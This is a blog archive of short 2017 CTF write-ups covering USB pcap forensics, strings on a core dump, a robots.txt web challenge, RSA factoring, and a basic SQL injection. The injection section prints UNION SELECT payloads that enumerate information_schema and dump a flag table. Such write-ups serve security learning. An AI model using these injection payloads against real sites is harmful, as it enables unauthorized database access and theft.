ISITDTU: tháng 2 2017

Thứ Tư, 8 tháng 2, 2017

[ALEXCTF 2017]-Fore3: USB probing (Forensics 150)

Open the pcap file in Wireshark, looking at the usb.capdata, and the packet 101:

It's a picture just chose the hex then export it, open it in Linux we'll get a flag:

Flag is:

ALEXCTF{SN1FF_TH3_FL4G_OV3R_USB}

[ALEXCTF 2017]-Fore1: Hit the core (Forensics 50)

Use strings in terminal, we got this string:

$ strings fore1.core
….
cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}
….

Hint for flag was take a first character every 4 character:

s = 'cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}'
print s[3::5]

$ python test.py
ALEXCTF{K33P_7H3_g00D_w0rk_up}

[BITSCTF-2017]-Batman vs Joker (Web 30)

This is SQL Injection Basic

' UNION SELECT table_name, column_name FROM information_schema.columns --
' UNION SELECT flag, 1 FROM Joker --

And we got flag:

BITSCTF{wh4t_d03snt_k1ll_y0u_s1mply_m4k3s_y0u_str4ng3r!}

[BITSCTF-2017]-BotBot (Web 10)

Looking at /robots.txt, i saw:

Useragent *
Disallow: /fl4g

So, /fl4g is 301. we access /fl4g/ and get flag:

$ curl -v http://botbot.bitsctf.bits-quark.org/fl4g
* Trying 205.139.17.49...
* Connected to botbot.bitsctf.bits-quark.org (205.139.17.49) port 80 (#0)
> GET /fl4g HTTP/1.1
> Host: botbot.bitsctf.bits-quark.org
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.10.0 (Ubuntu)
< Date: Sun, 05 Feb 2017 01:28:52 GMT
< Content-Type: text/html; charset=iso-8859-1
< Content-Length: 351
< Connection: keep-alive
< Location: http://botbot.bitsctf.bits-quark.org/robot/fl4g/
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://botbot.bitsctf.bits-quark.org/robot/fl4g/">here</a>.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at botbot.bitsctf.bits-quark.org Port 80</address>
</body></html>
* Connection #0 to host botbot.bitsctf.bits-quark.org left intact

$ curl -v http://botbot.bitsctf.bits-quark.org/fl4g/
* Trying 205.139.17.49...
* Connected to botbot.bitsctf.bits-quark.org (205.139.17.49) port 80 (#0)
> GET /fl4g/ HTTP/1.1
> Host: botbot.bitsctf.bits-quark.org
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.10.0 (Ubuntu)

< Date: Sun, 05 Feb 2017 01:28:54 GMT
< Content-Type: text/html; charset=UTF-8
< Content-Length: 41
< Connection: keep-alive
< X-Powered-By: PHP/7.0.15
<
* Connection #0 to host botbot.bitsctf.bits-quark.org left intact
BITCTF{take_a_look_at_googles_robots_txt}

Thứ Ba, 7 tháng 2, 2017

[ALEXCTF]-CR4:Poor RSA

Change the name of file key.pub to public.pem
Use this command to analysis the public.pem file
We can get n and e

Factor n get p and q then combine q,p with e we will get private key.
p = 863653476616376575308866344984576466644942572246900013156919
q = 965445304326998194798282228842484732438457170595999523426901
e = 65537
Use RSA tool to get private key